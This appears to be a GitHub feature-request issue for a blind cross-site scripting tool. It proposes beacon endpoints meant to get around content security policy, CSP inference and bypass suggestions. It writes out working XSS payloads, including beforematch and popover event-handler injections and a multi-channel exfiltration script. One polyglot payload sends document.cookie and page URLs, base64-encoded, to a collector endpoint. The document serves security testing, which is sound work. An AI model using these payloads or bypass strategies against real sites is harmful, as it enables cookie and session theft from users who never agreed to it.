A Feature Request or Two #209
Description
Universal Sink Endpoints with customizable URL(?):
/beacon/img # 1x1 transparent PNG (img-src bypass)
/beacon/font # Empty WOFF2/TTF font (font-src bypass)
/beacon/css # Empty CSS stylesheet (style-src bypass)
/beacon/manifest # Empty PWA manifest (manifest-src bypass)
/beacon/script # Empty JS file (script-src bypass)
/beacon/connect # Standard fetch/XHR endpoint (connect-src)
/beacon/form # Form action target (form-action)
/beacon/media # Empty MP4/audio file (media-src)
/beacon/object # Empty plugin data (object-src)
/beacon/worker # Empty worker script (worker-src)
/beacon/frame # Minimal HTML frame (frame-src)
/beacon/jsonp # JSONP callback endpoint for CSP bypass detection
/beacon/websocket # WebSocket upgrade endpoint
/beacon/eventsource # Server-sent events endpoint
/beacon/prefetch # DNS prefetch detection
/beacon/preload # Resource preload detection
/beacon/ping # <a ping> attribute target
/beacon/beacon # navigator.sendBeacon target
/beacon/report # CSP violation report collector
Capture and analyze all Sec-Fetch-* headers to understand exactly which CSP directive permitted the request:
{
"fetch_metadata": {
"sec_fetch_site": "cross-site|same-origin|same-site|none",
"sec_fetch_mode": "cors|navigate|no-cors|same-origin|websocket",
"sec_fetch_dest": "document|script|style|image|font|media|manifest|...",
"sec_fetch_user": "?1|null"
}
}Automatic CSP directive inference based on successful requests:
{
"inferred_csp": {
"allowed_directives": {
"img_src": true,
"connect_src": false,
"script_src": "nonce_detected",
"style_src": true,
"font_src": true,
"manifest_src": true
},
"bypass_vectors": [
"img-src allows arbitrary domains",
"font-src permits data: URIs",
"manifest-src unrestricted"
],
"strict_dynamic": false,
"trusted_types": false
}
}Expand beyond traditional cookie collection to capture 2025-relevant data:
{
"context_data": {
"csp_nonce": "extracted_nonce_if_available",
"trusted_types_policy": "detected|enforced|none",
"referrer_policy": "strict-origin-when-cross-origin",
"same_site_context": "Lax|Strict|None",
"http_only_cookies": "blocked_access_count",
"framework_detection": {
"react": "18.2.0",
"vue": null,
"angular": null
}
}
}Generate payloads based on detected CSP configuration rather than blind spraying:
// CSP-aware payload router
function generatePayload(cspConfig, targetEndpoint) {
if (cspConfig.strict_dynamic && cspConfig.nonce) {
return generateNonceBypass(cspConfig.nonce);
} else if (cspConfig.trusted_types) {
return generateTrustedTypesPayload();
} else if (!cspConfig.connect_src) {
return generateResourceBeacon(targetEndpoint + '/beacon/img');
}
return generateStandardPayload(targetEndpoint + '/beacon/connect');
}Modern Event Handler Exploitation
// beforematch event for hidden-until-found exploitation
const beforeMatchPayload = `
<div hidden="until-found" onbeforematch="
new Image().src='${endpoint}/beacon/img?trigger=beforematch&data=' +
btoa(JSON.stringify({url:location.href,time:Date.now()}))
">Hidden content</div>
`;
// Popover API exploitation
const popoverPayload = `
<div popover onbeforetoggle="
navigator.sendBeacon('${endpoint}/beacon/connect',
JSON.stringify({trigger:'popover',context:document.title}))
">Target</div>
`;Deploy payloads that attempt multiple exfiltration channels simultaneously:
<!-- Multi-vector payload for comprehensive CSP probing -->
<script>
// Primary: connect-src test
fetch('/beacon/connect?test=primary').catch(()=>{});
// Fallback 1: img-src beacon
new Image().src='/beacon/img?test=fallback1';
// Fallback 2: font-src data URI
document.head.appendChild(Object.assign(document.createElement('link'),{
rel:'preload',as:'font',href:'/beacon/font?test=fallback2'
}));
// Fallback 3: style-src import
document.head.appendChild(Object.assign(document.createElement('style'),{
textContent:'@import "/beacon/css?test=fallback3";'
}));
</script>Enhanced multi-context payloads:
const universalPolyglot = `
'"><svg onload="
// Multi-destination beacon
['/beacon/img','/beacon/font','/beacon/css'].forEach(e=>
new Image().src=e+'?ctx=svg&d='+btoa(location.href)
)
" style="display:none">
<!--</script><script>
// Script context backup
fetch('/beacon/connect?ctx=script').catch(()=>
document.body.appendChild(Object.assign(document.createElement('img'),
{src:'/beacon/img?ctx=script&d='+btoa(document.cookie)}
))
);
//-->
`;CSP Directive Analysis with Real-time visualization of which security policies are blocking vs. allowing requests:
Policy Coverage Report:
├─ connect-src: BLOCKED (0/15 attempts successful)
├─ img-src: ALLOWED (15/15 attempts successful)
├─ font-src: PARTIAL (8/15 attempts successful)
├─ style-src: ALLOWED (12/15 attempts successful)
└─ script-src: NONCE_REQUIRED (0/15 inline attempts)
Recommended Payload Strategy:
→ Use img-src beacons for primary exfiltration
→ Font-src shows potential for data: URI exploitation
→ Investigate nonce extraction for script-src bypass
Automated Bypass Suggestion Engine
Based on successful request patterns, suggest optimal attack vectors:
{
"bypass_recommendations": {
"primary_vector": "img-src unrestricted",
"payload_type": "resource_beacon",
"confidence": 95,
"advanced_techniques": [
"Cache-based nonce extraction possible",
"JSONP endpoint detected on same-origin",
"File upload functionality may allow JS hosting"
]
}
}Enhanced Notification System
{
"notification_template": {
"title": "Blind XSS Triggered - CSP Bypass Detected",
"details": {
"bypass_method": "img-src unrestricted",
"csp_confidence": "high",
"fetch_metadata": "cross-site navigate",
"recommended_exploitation": "Resource beacon chain"
}
}
}